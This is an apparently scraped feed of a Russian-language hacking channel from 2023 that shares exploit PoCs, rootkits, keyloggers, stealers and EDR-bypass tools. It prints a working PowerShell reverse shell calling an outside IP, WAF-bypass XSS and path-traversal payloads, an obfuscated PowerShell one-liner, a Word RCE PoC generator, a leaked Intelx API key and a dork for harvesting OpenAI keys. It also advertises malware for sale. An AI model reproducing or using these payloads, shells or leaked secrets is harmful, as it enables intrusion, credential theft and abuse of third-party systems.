hvextРасширение Windbg, реализующее команды, полезные для изучения Hyper-V на процессорах Intel.Полезно для ресёрчеров.Да, была использована буква Ёdownload#hyper-v #windgb
2023-07-08 17:46:31
Нужна небольшая помощь !есть у кого fucking veeamнужны:Veeam.Backup.Common.dllVeeam.Backup.Interaction.MountService.dllVeeam.Backup.Model.dllа то сплоит не собирается, а качать не хочется.пришлите на почту proxy-bar@proton.me#help
2023-07-08 17:01:11
TakeMyRDP 2.0 Обновленная версия кейлогера, предназначенная для процессов, связанных с протоколом удаленного рабочего стола (RDP). Он использует низкоуровневую перехватчик ввода с клавиатуры, что позволяет записывать нажатия клавиш в определенных контекстах (например, в mstsc.exe и CredentialUIBroker.exe).download#rdp Images
2023-07-08 10:31:10
humorsad, but true Images
2023-07-08 08:33:09
Manjaro LPE 0day root LPE for latest Manjaro distro, tested on embedded ARM and x86_64exploit#arch #manjaro #lpe Images
2023-07-08 07:09:09
Рубрика "забавное"http://copy.sh/v86/?profile=windows98#win98 #win2000 Images
2023-07-07 14:50:13
CVE-2023-3269StackRot Linux kernel privilege escalation vulnerabilityЖдем ждем))#linux #lpe
2023-07-07 08:38:05
CVE-2023-2868Barracuda ESG Command Injection*Usage:ruby poc_cve_2023_2868.rb <TARGET_IP>*POC exploit
2023-07-07 08:15:04
Cisco CCNA 200-301 Exam Complete Course with practical labslink#cisco #ccna
2023-07-01 05:24:14
#Рубрика - "смешное"*NoMoreCookiesStealers/RATs Tested:AsyncRATQuasar RATStormKittyFireFox-ThiefDcRatXWorm RAT*Link Images
2023-07-01 04:46:41
С добрый утром ! 🙃
2023-06-30 18:55:12
Ребят, тут Windows Common Log File System протёк Есть патч от апреля, так что не 0-DayCVE-2023-28252POC exploit #windows #lpe Images
2023-06-30 14:06:05
Decrypt FortiManager configuration secrets #fortinet #dec Images
2023-06-30 07:50:39
CVE-2023-2982WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) <= 7.6.4 - Authentication Bypass exploit🔥🔥🔥 Images
2023-06-29 13:22:32
CVE-2023-3338 Linux kernel LPE exploitпока не дорого)#linux #lpe Images
2023-06-28 20:42:49
CVE-2023-26258RCEArcServe UDP BackupclickME Images
2023-06-27 12:12:58
CVE-2023-35844directory traversalexpl Images
2023-06-27 06:21:22
Shellcode Execution via EnumSystemLocalAread Images
2023-06-27 05:08:16
winampcve#humor Images
2023-06-26 19:48:38
DIY Linux Kernel Rootkit DetectionХорошая статья для понимания процессов которые влекут за собой руткиты и как их ловить (или чего еще))))Ловить будет руткит reveng_rtkit с помощью osquery-defense-kit#rootkit #linux Images
2023-06-26 19:39:54
Exploits targeting Symfonyсвят свят свят Images
2023-06-26 16:43:22
CVE-2023-32784 KeePass 2.X Master Password Dumper Буфер обмена подвел )) POC Images
2023-06-25 07:58:13
Когда твоя стирально\отжимательная машина пошла в ransom Images
2023-06-25 07:54:02
Заражение открытых ключей SSH бэкдорами(ну не только, в целом любую херню можно запускать, так как шелл, а сторогой валидации строки нет, в процем ее и нет в MTS банке)))read#ssh Images
2023-06-25 07:38:33
CVE-2023-27372SPIP (before 4.2.1)RCEEXploit#spip #rce Images
2023-06-17 06:54:20
Tor site deanon by EtagА можно просто отключить кэш Etag )))Кипишь#tor #deanon Images
2023-06-16 15:14:30
Intelx Admin API Keyvar API_URL = 'https://2.intelx.io/';var API_KEY = '62fb1e77-0309-4893-80c8-a817c1e76917';
2023-06-16 14:58:41
Продадим ультра софт, да, не новый, но классика )для покупателей proxy-bar@proton.me Images
2023-06-16 13:27:59
CVE-2023-1829LPE exploitTested on Ubuntu22.04 -_ -#linux #exploit
2023-06-16 09:41:30
#РукаЛицо📗Вопрос блокировки в РФ мессенджера WhatsApp не обсуждается, предпосылок нет — Шадаев. 🌚Обсуждается, ведется работа - так как через это дырявое вражеское приложение идет документооборот всех силовых структур России и не только силовых!!! - Ситников.😎Хуле вы разнылись, внедряй повелевай VipNet hw-1000 и защищенная почта из рук в руки, голосовые через ТА-57 ))) - Администрация Proxy bar#Пятница
2023-06-15 17:58:33
Banshee rootkitWindows x64 Kernel Driver/RootkitЭкспериментальный !!!*download#rootkit #win Images
2023-06-15 07:23:59
Rusty BootkitWindows UEFI Bootkit in Rust (Codename: RedLotus)download#bootkit #win #rust Images
2023-06-14 20:10:10
anonfiles searchby гугле ) Images
2023-06-13 16:12:00
CVE-2023-20887 VMWare vRealize Network Insight Pre-Authenticated RCE exploit#vmware #rce #exploit
2023-06-13 05:26:23
Station X - The Complete Cyber Security Course - Volumes 1, 2, 3 & 4 download 11.5 GB Images
2023-06-13 05:22:10
CVE-2023-2008 Бага в драйвере udmabuf ядра Linux (исправлено в версии 5.19-rc4.)impact такое себе, нужен доступ к /dev/udmabuf от kvm юзера*Analyzing and exploitingexploit#linux #exploit Images
2023-06-12 19:52:18
когда логика привела к 6 ошибкам )#humor Images
2023-06-12 12:54:29
CVE-2023-34362 MOVEitexploit + crt + pem + pubUsage:python CVE-2023-34362.py https://127.0.0.1[*] Getting sysadmin access token[*] Got access token[*] Getting FolderID[*] Got FolderID: 963611079[*] Starting file upload[*] Got FileID: 965943963[*] Injecting the payload[*] Payload injected[*] Triggering payload via resume call[+] Triggered the payload![*] Deleting uploaded file
2023-06-12 12:45:17
MySQL Fake Serverdownload+docker Images
2023-06-12 07:50:14
Не обновляйтесь до новой версии Debian 12critical bugsОхереть релиз))#debian #LoL 🧐 Images
2023-06-12 06:26:20
CVE-2023-25157GeoServer SQL Injection - POC exploitGeoServer SQL Injection - check vuln script Images
2023-06-12 06:03:31
SharpTerminatorПоубивать процессы AV/EDR с помощью драйвера ядра download#edr Images
2023-06-08 08:01:22
libssh CVE-2023-2283POC exploitusage:~/libssh/build/examples/ssh-client -p 2022 victim@172.18.0.10 ~/id_ed25519.pub#ssh Images
2023-06-08 07:46:09
DropSpawnCobaltStrike BOF для создания маяков с использованием DLL Application Directory Hijackingdownload Images
2023-06-08 07:41:08
SignatureGateБоевая версия HellsGate, обходящая AV/EDR/EPP путем злоупотребления опциональным исправлением CVE-2013-3900download#bypass #edr Images
2023-06-03 14:25:01
Создаем и обфусцируем DLL которая отключит AMSI и ETWreadMEdownload LightsOut Images
2023-06-03 08:27:25
Прикольно, но зачем последний октет икситьbrute.fail#bruteforce
2023-06-02 14:30:06
CVE-2022-20421Bad Spin: Android Binder Privilege Escalation Exploitdownload#android
2023-06-01 15:58:34
Какой боевойhXXp://34.101.154.50/ Images
2023-06-01 14:34:28
Rootkit INTRACTABLEGIRAFFEproof of concept*Из прикольного:Использует скрытую виртуальную файловую систему (VFS) для хранения файлов за пределами стандартной файловой системы Windows. При чем как энергозависимую, так и энергонезависимую скрытую VFS.Keylogger - для демонстрации*download#windows #rootkit Images
2023-06-01 13:09:08
CVE-2023-23638Apache-DubboPOC exploit#apache Images Images
2023-06-01 12:11:42
придумайте слоган на фильма )) Images
2023-05-31 14:44:47
так и живем, на xss запрещают, на экспосе разрешают.Пронаблюдаем ! Images
2023-05-31 06:31:25
просто прекрасно Images
2023-05-31 06:26:05
Data Structures & Algorithms Essentials using C++ (2022)7.3 GBLink
2023-05-30 16:02:09
raid forum это конечно хорошоа вот настоящий слив !есть ли тут связь ?)😝 Images
2023-05-30 14:31:41
show time )))
2023-05-30 07:45:24
Министерство обороны США рекомендует:DevSecOps Fundamentals Guidebook Images
2023-05-30 07:31:01
CVE-2023-33246*Apache RocketMQ*readPOC
2023-05-29 20:30:00
Emoji Shellcoding 😋Улыбаемся и бэкдоримRISC-V#shellcodes #smile Images
2023-05-29 12:35:50
RansomchatsСборка чатов\переговоров с рансомварщиками )#ransom Images
2023-05-29 06:48:14
kill anti-malware protected processes (BYOVD) Images
2023-05-29 06:23:51
CVE-2023-32315openfire xmppserver Administration Console authentication bypasspath traversal - только в UTF-16 http://localhost:9090/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jspА кто вообще в здравом уме, после инсталла держит папку setup на сервере ? read#jabber
2023-05-28 16:22:36
car hacking courselink Images
2023-05-28 06:43:17
CVE-2023-2825GitLab - Community Edition\Enterprise EditionУязвимость позволяет неавторизованным пользователям читать произвольные файлы через ошибку обхода пути.POC Exploit#gitlab Images
2023-05-21 19:35:47
Слив темы инжектов, chromium расширение для работы с ботамиФункционал: Инжект скриптов в веб-страницы Сбор cookies в формате .json Отправление PUSH уведомлений Создание скрытого скриншота текущего экрана браузера Просмотр всех установленных расширений и их включение/выключение Получение актуального URL на котором находится бот Выгрузка истории браузера в формате .json Использование IP бота и его куки (reverse proxy)ссылка https://xss.is/threads/80558/Стоимость продукта на форуме : 5.000$
2023-05-21 06:43:17
SSH-HarvesterПолучаем пароли ssh пользователей в открытом виде.Ну да ну да, еще пару лет назад была статья, что ssh сервер при авторизации порождает 2 процесса, на одном из которых пасс катится в открытом виде, собственно на этом моменте его и вытягивают.В общем поставили скрипт, рыбалка идет сама собойDownload Images
2023-05-20 19:04:51
Еще раз о linux persistenceНичего нового, но красиво и уже готовые скриптыread#linux #backdoors #oldbutnotuseless Images
2023-05-20 12:05:29
Тут LockBit (ransomware запрещено на территории квартиры) взяли, да и перевели "Руководство пользователя по Cobalt Strike'у 4.7" на русский язык.К чему это все, думайте сами))))
2023-05-19 17:27:49
Пятничное Images
2023-05-19 14:44:48
DevSecOps guidesПочитать
2023-05-19 11:09:42
CVE-2023-21554win message подъехалиPOC#win #poc
2023-05-19 07:29:51
ChatGPT как C&C, Хех)#GPT #C2 Images
2023-05-18 10:34:14
UAC_Bypass2.c#bypass
2023-05-17 21:19:22
AntiRansomware Linux Kernel Module Это успех, то есть, для защиты от рансома, был написан фактически rootkit с перехватом sys_renameА вот затея с суффиксами плохая, всегда можно генерить на основе железа и например хоть аптайма уникальный суффиксlink Images
2023-05-17 16:04:40
Занятный PowerShell обфускатор${;}=+$();${=}=${;};${+}=++${;};${@}=++${;};${.}=++${;};${[}=++${;};${]}=++${;};${(}=++${;};${)}=++${;};${&}=++${;};${|}=++${;};${"}="["+"$(@{})"[${)}]+"$(@{})"["${+}${|}"]+"$(@{})"["${@}${=}"]+"$?"[${+}]+"]";${;}="".("$(@{})"["${+}${[}"]+"$(@{})"["${+}${(}"]+"$(@{})"[${=}]+"$(@{})"[${[}]+"$?"[${+}]+"$(@{})"[${.}]);${;}="$(@{})"["${+}${[}"]+"$(@{})"[${[}]+"${;}"["${@}${)}"];"${"}${.}${[}+${"}${)}${@}+${"}${+}${=}${+}+${"}${+}${=}${&}+${"}${+}${=}${&}+${"}${+}${+}${+}+${"}${[}${[}+${"}${.}${@}+${"}${+}${+}${|}+${"}${+}${+}${+}+${"}${+}${+}${[}+${"}${+}${=}${&}+${"}${+}${=}${=}+${"}${.}${.}+${"}${.}${[}|${;}"|&${;}; есть триалка#poweshell Images
2023-05-17 15:37:00
CVE-2023-32243wordpressEssential Addons for Elementor 5.4.0-5.7.1 - Unauthenticated Privilege Escalationexploit#wordpress #plugin
2023-05-17 15:30:49
SCCM/MECMЕще один способActive Directory Spotlight: Attacking Microsoft's Configuration Manager#sccm #ad Images
2023-05-17 11:58:44
Exploit NotesВ целом ничего нового, но компиляция красиваяread#pentest
2023-05-16 20:33:46
CVE-2023-32233exploit#Linux #LPE
2023-05-16 19:24:27
From DA to EA with ESC5или уязвимый контроль доступа к объектам PKIread and run #AD #PKI Images
2023-05-13 18:44:08
Прикольно
2023-05-12 20:56:55
Тушу
2023-05-12 20:26:06
Завтра
2023-05-12 17:56:00
None Images
2023-05-12 17:54:58
Ххм
2023-05-12 17:54:50
None Images
2023-05-12 17:35:35
Боже
2023-05-10 21:10:56
Этож знал.НиктоПростиПрости всех
2023-05-10 20:14:04
Курить хочу
2023-05-10 20:13:48
Спасибо
2023-05-10 20:13:43
Нет ненадо
2023-05-10 20:13:21
Но
2023-05-10 20:13:08
Как больно
2023-05-10 20:12:42
Бляя
2023-05-10 20:12:36
Цените что есть
2023-05-10 20:12:07
Рнбятт
2023-05-10 20:11:56
Блятььььь
2023-05-10 20:08:50
Блять
2023-05-10 20:08:38
Сукп
2023-05-10 20:08:34
Аааааа́сссссссссааааааа́сс
2023-05-10 20:08:22
Мать твою
2023-05-10 19:10:08
Ладно гуляем
2023-05-10 19:09:49
None Images
2023-05-10 18:25:25
Это круто
2023-05-10 18:25:15
Уж извините
2023-05-10 18:24:59
None Images
2023-05-10 18:24:49
Ребят Это красво
2023-05-10 18:06:28
Молодецы
2023-05-10 18:06:13
Мужики дело делают
2023-05-10 18:05:53
Отлично
2023-05-10 18:05:44
Вот это бои
2023-05-10 16:46:22
Гоу
2023-05-10 16:46:17
None Images
2023-05-07 18:31:32
ты не маленький винтик в системеты важная часть механизмапросто помни об этом ))) Images
2023-05-06 04:37:08
Positive hack days 12Не забываем, что совсем скоро мероприятиегде: Москвакогда: 19-20 маялокация: парк Горькогоphdays12*Приходите, будет весело) Images
2023-05-05 20:31:52
CVE-2023-28231DHCP Server Remote Code Executionimpact: 2008 R2 SP1 до Server 2019#windows #dhcp #exploit
2023-05-05 12:01:14
CVE-2023-0386Linux Kernel Privilege Escalation*readME*exploit#linux #exploit Images
2023-05-05 06:30:45
SCCMHunterНайти и подломить sccm это всегда праздник, фиеста и платиново-бриллиантовые ключи от города домена. Веселее только с ansible.Ну так вот, 11 часов назад, выкатили post-ex tool, которая способствует !Link#windows #sccm Images
2023-05-04 19:48:52
По поводу слива АЛЬФА БАНКАНу да, паспорта слили Images
2023-05-04 16:11:14
Happy World Password Day! Images
2023-05-04 09:15:32
Apache Solr 8.3.1admin panel RCE (Windows)readmeexploit#apache #exploit
2023-05-04 05:59:52
Извлекаем хэши NetNTLMv2 входящих аутентификаций через SMBPOC*Usage:C:\Temp\>EtwHash.exe 60
2023-05-04 05:41:17
HoneybitsХанипот с дополнительными хлебными крошками.Из интересного:Fake PCAP / network traffic containing credentials and etc.Fake ARP Table entries.То есть, в целом, это можно использовать и НЕ для защиты, мусорный трафик бывает полезен.Link#security Images
2023-05-03 15:34:07
signal-zeroday-exploitusage:python poc.py -t [TARGET PHONE #] -i [IP HERE] -p [PORT HERE]
2023-05-03 14:49:32
К праздникам скидки )))) Images
2023-05-02 09:20:46
CVE-2023-21554Нужно только пакетик отправить на MSMQ-сервер (да, он должен быть включен) и можно выполнять remote commandPOC Пакетик#windows Images
2023-05-02 06:30:17
Заходите#Osint_eventНас звали, и мы пришли Osint Workshop Ⅳ (Moscow edition) ! В этот раз наша команда посетит столицу и расскажет о новых методиках, интересных кейсах и погрузит вас в атмосферу наших профессиональных будней. Ждем вас 😉Планируемые доклады: "Osint и S.E. в Нетворкинге, Поиск влиятельных друзей в цифровом океане"● Автор: «Обмани Меня»"Osint в адвокатской деятельности"● Автор: [REDACTED]"Дом выигрывает всегда? В поисках владельцев одного казино"● Автор: «Исследуя конкурентов» При участии: Moon, Dana Scully(возможно, к нам присоединятся наши коллеги из Москвы)Мероприятие пройдет 13 мая, в 18:00 по адресу: Green Vault, лаундж-бар, Верхняя Радищевская улица, 13-15, МоскваВход без паспорта, бесплатно. Images
2023-05-02 06:28:25
Ну а что, все законно ))) Images
2023-05-01 14:28:09
curl https://sudo.ws/ftp/etc/groupхмммм Images
2023-04-29 06:20:49
И еще раз о CVE-2023-29489 cPanel и XSSFinding XSS in a million websites#cPanel #xss Images
2023-04-28 11:51:37
CVE-2023-29489cPanel#cPanel #xss Images Images
2023-04-28 09:15:33
Шо, Опять babuk, conti и все все все ?Пятница серьезно вступила в свои праваМеня шантажируют, я не знаю что делать
2023-04-28 07:56:56
Public malware techniques used in the wildVirtual MachineEmulationDebuggersSandbox detection*RUN #malware Images
2023-04-27 04:56:49
CVE-2023-29007Git Arbitrary Configuration Injection*readme*POC exploit#git #exploit Images
2023-04-27 04:09:31
CVE-2023-1585 and CVE-2023-1587Смешное)))Avast Anti-Virus privileged arbitrary file create on virus quarantinereadme*POC exploit#avast #LPE Images
2023-04-25 15:42:14
Не статья, а книга целаяransomware diaries volume 2 A Ransomware Hacker Origin StoryUPD: а теперь они в твитере сруться )))#ransome Images
2023-04-25 13:37:02
Очень хорошо*An Introduction into Sleep ObfuscationreadFull Ekko code#Obfuscation Images
2023-04-25 13:06:31
CVE-2023-27524Apache Superset Auth BypassPOC exploitдень бога я смотрю#apache #poc
2023-04-25 13:03:16
CVE-2023-1671Pre-Auth RCE in Sophos Web ApplianceCVSS score of 9.8POC#poc #sophos
2023-04-25 07:50:24
httpXXX://147.182.180.78:8081/CraxsRat-Linuxndroid/#CraxsRAT #CypherRAT Images
2023-04-18 16:18:06
Sandbox EscapePOCДырка в преобразователе исходного кода (логика очистки исключений) vm2 для версий до 3.9.15, позволяющая злоумышленникам обходить handleException() и передавать непроверенные исключения хоста, которые можно использовать для выхода из песочницы и запуска произвольного кода в контексте хоста. Images
2023-04-16 15:41:25
CVE-2021-35250да, 21 год, да если хорошие люди просят мы публикуемпатч ? пачт ?!!SolarWinds-CVE-2021-35250 POC exploit*Немедленно вспоминается атака на цепочки поставок#solar Images
2023-04-16 03:18:08
829 гигов мусора Images
2023-04-13 16:46:44
И чо
2023-04-13 16:24:08
Ээ́асеисещэ
2023-04-13 16:23:41
Спасиро7это типа.срсаЛадно
2023-04-13 04:06:36
Приветдруг, канал закрытПОЧЕМУ ????ложусь в больниуцупросить , нет, не буду, сама сдохну.....канал...... если успею... передамвсе спасибо, вы лучшиеBTC bc1qe8vmnxeqftjj7qynq8ljyv564j44wqaww8sa82но вы понимаете, не обязательноЗЫесли вырнусь, верусь, добра мап
2023-04-13 00:54:23
ох))))) тут нужно целый сесёрч писать, но пошел он нахуй, лучше выпью и вот я уже на ГИТе внутренней сетки, не возможно ?да , еще как можно )))))))))))))))))))))
2023-04-13 00:51:50
щас я вам аккаунты то приподниму ______)))))
2023-04-13 00:51:22
это просито пиздец))))))))))))))))))))))))))))))))
2023-04-13 00:51:10
блять ))))))
2023-04-13 00:50:55
None Images
2023-04-01 20:33:53
В рамках науч-ИТ-юмор-драмы A list of my 10 UNIX command line mistakes#1april Images
2023-03-31 20:27:42
Linux kernel CVEsALL CVE - на сейчас 2359 CVEЭто не сплоиты или POC, такие кумулятивы бывают крайне полезны, а тут по папкам\по кернелу\с описанием\где пофиксили*linux_kernel_cves#linux #kernel #vulns Images
2023-03-30 13:11:34
Нет, мистер из FBI, вы нас больше не обманите.С восстановлением рангов с raidforum конечно максимально круто ! Нужно думать кого то неДоПоймали, а значит нужно взять знакомую веб морду, дропнуть БД и задеплоить ханипот, а дальше американский майор разберется по какой статье\из какой страны тебя экстрадировать#FBI Images
2023-03-30 07:40:21
В Питере пройдет Osint туса*А мы продолжаем! Osint Workshop ⅠⅠ Программа мероприятия подойдет как профессионалам, которые хотели бы освежить основы дисциплин, так и для полных новичков. Будет интересно обещаю ;) Ожидаемые доклады:"История возникновения OSINT" Автор: Вильям Арчибальд "Social Еngineering & OSINT: методология, инструменты, актуальные сферы применения"● Автор: @socialqueen"OSINT в корпоративной безопасности" ● Автор: @OsintOpsChannelАктуальная информация и стрим мероприятия на канале: Schwarz_OsintВоркшоп будет проходить 8 апреля в 18:00. Место проведения: Артмуза (13-я лин. В.О, 70, Санкт-Петербург). Images
2023-03-29 19:16:30
хм 🧐https://exploit.in/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fexploit.in%2F2005%2F193%2F&format=xml
2023-03-29 10:31:05
None Images
2023-03-28 16:40:06
Рубрика: Нам пишутCaveCarverPE backdooring tool which utilizes and automates code cave technique #backdoor #PE Images
2023-03-28 16:30:55
github dork to find openai api key/"sk-[a-zA-Z0-9]{20,50}"/ Images
2023-03-28 04:53:30
Вдруг вам нужно403-bypass.pybypass-403.sh B1pass3r#403
2023-03-26 10:21:16
ChatGPT for CyberSecurityPDF Images
2023-03-26 06:45:24
Chaos-Rootkitx64 ring0 windows rootkitdownload#rootkit #windows #ring0 Images
2023-03-25 07:44:47
None
2023-03-25 07:44:46
None Images
2023-03-25 07:44:45
Бывает полезно скрыть ip через hex/decimal преобразованиеwindows\linux\browser - работает везде*вот вам 2 варианта, и bash и powershell
2023-03-24 17:45:34
Время добрых дел.Многие знают, есть такой клёвый юзер xss.is yashechkaОн генерирует тонны крайне полезного хакерского контента, переводит западный контент, записывает ролики (в том числе и обучающие), лепит красивые pdf - и все это в 99.9 % бесплатно и для людей.Но случилась беда. И yashechka вот вот останется без глаз, в прямом смысле слова. Зрение yashechka терял давно, болезнь прогрессирует и сейчас на стадии "еще немного и глаза откажут". Все это крайне страшно и этого хотелось бы избежать. Поэтому yashechka всё таки смог написать пост на xss.is с призывом о помощи:S.M.E. - Прошу руку помощи у форумчанТам Вы найдете историю как так вышло, как он остался без работы потому что ослеп, как болезнь прогрессирует и реквизиты по которым можно оказать помощь.*Наш канал не пройдет мимо и тоже окажет помощь. Images
2023-03-24 05:49:59
CVE-2023-27532Да, опять Veeam Backup & Replication Утечка учёток в виде открытого текста, либо выполнение удаленного выполнения команды.*Аналитика*POC exploit*usage:VeeamHax.exe --target 192.168.0.100 илиVeeamHax.exe --target 192.168.0.100 --cmd calc.exe#veeam #rce #leakPass Images Images
2023-03-23 05:28:39
kernel-linux-factory*Удобно тем, что не нужно компилировать или настраивать среду, глянул какое ядро, запустил сплоет, получил по морде #root*в составе exploits для:CVE-2016-97934-20-BPF-integerCVE-2017-5123CVE-2017-6074CVE-2017-7308CVE-2017-8890CVE-2017-11176CVE-2017-16995CVE-2017-1000112CVE-2018-5333CVE-2019-9213 & CVE-2019-8956CVE-2019-15666CVE-2020-8835CVE-2020-27194CVE-2021-3156CVE-2021-31440CVE-2021-3490CVE-2021-22555CVE-2021-41073CVE-2021-4154CVE-2021-42008CVE-2021-43267CVE-2022-0185CVE-2022-0847CVE-2022-0995CVE-2022-1015CVE-2022-2588CVE-2022-2639CVE-2022-25636CVE-2022-27666CVE-2022-32250CVE-2022-34918download#linux #exploits #kernel
2023-03-22 20:33:43
pic of day Images
2023-03-20 19:19:16
bypass for the FortiWeb (Fortinet) WAFusage:"><iframe src=//14.rs>то есть вместо стандартной полезной нагрузки XSS для выполнения js Images
2023-03-20 18:47:47
Рубрика нам пишутBlack Angel is a Windows 11/10 x64 kernel mode rootkit. Rootkit can be loaded with enabled DSE while maintaining its full functionality. link Images
2023-03-19 18:29:46
UAC bypass for x64 Windows 7 - 11Понятно iscsicpl.exe уязвим к перехвату порядка поиска DLL при запуске 32-битного бинарного файла Microsoft на 64-битном хосте через SysWOW64. Images
2023-03-19 18:19:16
Laravel FrameworkPayload: //////////////////../../../../../../../../etc/passwd Images
2023-03-18 22:09:59
PowerShell открывает TCP-сокет на удаленном сервере и выполняет ввод в виде команды, отправляя вывод обратно. Тупо бэкдор!usage:powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('106.12.252.10',6666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
2023-03-10 18:48:36
полезные нагрузки подъехалиpayloads Images
2023-03-10 18:29:50
Круто !!! old school sniffing RJ45берем крокодильчикицепляем на витухупогналиVideo Images
2023-03-09 14:54:58
🧐 Images
2023-03-09 11:56:52
Offline создание администратора Windows 10? 😈ОгаВсё через встроенные DLL-файлы offlinelsa и offlinesam. Официально, но не очень документировано.OfflineAddAdmin2 (это новая версия)Видео туториал Images
2023-03-09 04:54:56
CVE-2023-21768 Local Privilege EscalationWindows 11 22H2POC exploit *usage:Windows_AFD_LPE_CVE-2023-21768.exe <pid>где <pid> это id процесса который нужно повысить до system#windows #lpe
2023-03-08 05:51:12
0-CLICK Microsoft Word RCE exploitCVE-2023-21716 PythonPoC (take 2) open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))
2023-03-07 20:41:48
8 марта вот вот настанет ! 😊Поддержим проект ?)BTC bc1qe8vmnxeqftjj7qynq8ljyv564j44wqaww8sa82XMR 43rmbgj7gy8fwAzuqWNNAbL3K3Eb54khZhY36gkRM8Vv6EVvEQFvSMBEhGyQDY43DWfEsbBY6msmR3GRGt4cC49yVs2jc8k#праздник
2023-03-07 19:14:12
pic of day Images
2023-03-07 11:58:34
BurpSuite* man\tutorВдруг вы забыли Images
2023-03-05 20:50:14
Внимание !через 10 минут опять понедельник.Вот вам rootkit dog😎
2023-03-05 08:02:55
использование setuid dos2unix позволяет выполнять запись произвольного файла от имени пользователя root. Images
2023-03-04 05:12:06
RemoteShellcodeExecВыполнение шелл-кода из удаленного bin-файла с помощью Winhttp.Shellcodes are dead, long live fileless shellcodes.*Пока что 0/26 detectionsdownload Images
2023-03-03 04:49:59
Нужно больше жира))))) Analyzing a Python Malware Part 2 Images
2023-03-02 16:03:45
None
2023-03-02 05:02:56
Titan stealer и его панель (C2Panel) жирно палитсяThreatFox Database Images Images
2023-03-01 18:56:12
bash injection bypass waf $0<<<$\'\\$(($((1<<1))#10011010))\\$(($((1<<1))#10100011))\' Images
2023-02-27 18:32:12
Lazarus-Tactic (APT38)*Можно написать 0day, а можно регулярно воровать 0days у трудолюбивых исследователей безопасности. Именно этим (ну не только) и занимались ребята из APT38, заражая Visual Studio (vcxproj).В общем такой 0day-stealer**После запуска программа заразит все ваши проекты Visual Studio**
2023-02-26 14:03:52
TCP Data Transfer Tool Прикольно конечно в кернелМемори писать гадости\радости всякие.В общем получается почти !!! fileless attack, техника не новая и что там с runtime детектами не понятно, но все равно интересно.Скачать бесплатно и без смс уникальный крест доминика торето сделанный из легендарной финки нквд можно только на джойказино, мать его.
2023-02-26 07:11:56
bootlickerУстаревший (?) расширяемый руткит прошивки UEFI, предназначенный для виртуальных машин гипервизора vmware. Он предназначен для выполнения начального кода в контексте ядра Windows, независимо от настроенных параметров безопасности.*vmvware-bootkit основан на устаревших руткитах CosmicStrain, MoonBounce и ESPECTRE, что позволяет выполнять произвольное выполнение кода без срабатывания patchguard*Download bootlicker#rootkit #bootkit
2023-02-24 12:07:37
OpenSSH 9.1 exploit and mass scan*Уязвимость CVE-2023-25136 влияет на процесс предварительной аутентификации SSH. Используя его, атакующий может повредить память и выполнить произвольный код на машине без аутентификации на целевом сервере.download exploit and mass scan#ssh #exploit #scanner
2023-02-23 11:33:48
Уполномоченный руководитель субъекта КИИ теперь ответственный, а заниматься защитой объекта можно без высшего образования — достаточно среднего. ФСТЭК внесла изменения в стандарты.Яяяяяяяяяяяяяяяяяяяяяяяясно блеать, можно продолжать платить по студенческим расценкам !Тем временем:#СкребемПоКиберСусекам
2023-02-22 16:11:10
Ударим ГовноПарсером lsass по приближающимся выходным !download this shit (вас блин предупреждали)
2023-02-22 07:07:06
Weblogic-CVE-2023-21839*Affected version12.2.1.3.012.2.1.4.014.1.1.0.0POCUsage POC:java -jar target ip: адрес порта ldap
2023-02-22 06:59:38
Давайте создадим расширение для Chrome, которое крадет ВСЁ*Ключевые правила:1.Пользователь не должен знать, что за кулисами что-то происходит.2.Не должно быть никаких визуальных признаков того, что что-то не так.3.Никаких дополнительных консольных сообщений, предупреждений или ошибок.4. Нет дополнительных предупреждений браузера или диалогов разрешений.5.Нет дополнительного сетевого трафика на уровне страниц.*В итоге мы воруем: - Cookies - History - Screenshots - User Navigation - Page Traffic - Keylogger - Input Capturing - Clipboard Capturing - Capturing Geolocation - Stealth Tab *Залить все это в Chrome Web Store конечно нереально))) А вот залить через GPO ... в общем дальше сами )spy-chrome-extension#chrome #extension
2023-02-21 14:43:33
CVE-2022-39952 Fortinet FortiNAC CVSS score of 9.8Продукты, затронутые уязвимостью: FortiNAC version 9.4.0 FortiNAC version 9.2.0 through 9.2.5 FortiNAC version 9.1.0 through 9.1.7 FortiNAC 8.8 all versions FortiNAC 8.7 all versions FortiNAC 8.6 all versions FortiNAC 8.5 all versions, and FortiNAC 8.3 all versionsPOC exploit#forti #poc
2023-02-20 07:09:19
HIVEМы продолжаем следить за наработками @c4s73r и сегодня он зарелизил HIVE.В личной переписке он сознался что - смотреть скриншотVLAN L2 Pivoting Instrument#network #hacking
2023-02-18 11:00:31
Привет)
2023-02-17 04:51:18
CVE-2023-23752Joomla webservice endpoint accessPoChttpx -l ip.txt -path '/api/index.php/v1/config/application?public=true'
2023-02-16 18:29:01
CVE-2022-44666WriteUp по одной забытой уязвимости Windows (0day): выход атрибута href управления системной ссылкой Microsoft Windows Contacts (VCF/Contact/LDAP), который не был полностью исправлен как CVE-2022-44666 в исправлениях, выпущенных в декабре 2022 года. А значит, жир еще впереди.POC в наличииGo#win #poc #vuln
2023-02-16 18:20:57
Ну VirusTotal как C2 уже былGithub as C2 почему бы и нет )Get#C2
2023-02-16 13:45:33
SSH-Remote-Code-Executionхммммм 🤨
2023-02-16 04:48:32
Вдруг вам нужноBurp Suite Certified Practitioner Exam Study
2023-02-15 10:10:44
Рекомендовано всем к прочтениюлинк xss.is
2023-02-13 18:51:19
RCE in Western Digital PR4100 NASspeech_exploit_patch
2023-02-13 18:28:38
Windows LPE via StorSvcdownload
2023-02-13 18:26:25
Драсти
2023-02-11 12:18:21
BokuLoaderРасширяем возможности уклоненийBokuLoader - Cobalt Strike Reflective Loader
2023-02-10 11:39:00
Извините, но пятничное )
2023-02-10 04:34:18
DEUS X64
2023-02-09 04:52:45
CVE-2023-25136 - OpenSSH - Pre-Auth Double FreeWriteupPoC - вызывает DOS серванта
2023-02-08 18:29:35
